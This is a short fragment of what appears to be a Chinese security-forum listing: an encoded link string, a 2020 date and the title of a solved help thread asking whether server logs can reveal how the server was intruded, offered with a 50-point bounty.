g2r3i4@1u0o6i4K6S2o6i4@1f1@1i4@1t1^5i4@1u0n7i4@1f1^5i4@1p5$3i4K6R3I4i4@1f1$3i4K6V1^5i4@1q4r3i4@1f1#2i4K6W2n7i4@1u0q4i4@1f1%4i4K6R3&6i4K6R3%4i4@1f1&6i4@1p5&6i4@1q4o6i4@1f1$3i4K6R3H3i4K6S2q4i4@1f1@1i4@1t1&6i4K6R3^5i4@1f1^5i4@1p5%4i4@1p5K6i4@1f1$3i4K6W2q4i4K6V1H3i4@1f1%4i4K6W2m8i4K6R3@1i4@1f1#2i4K6V1#2i4K6S2m8

2020-8-23 21:06

0

[已解决] [求助]服务器被入侵有日志这些能找出漏洞吗 50.00雪花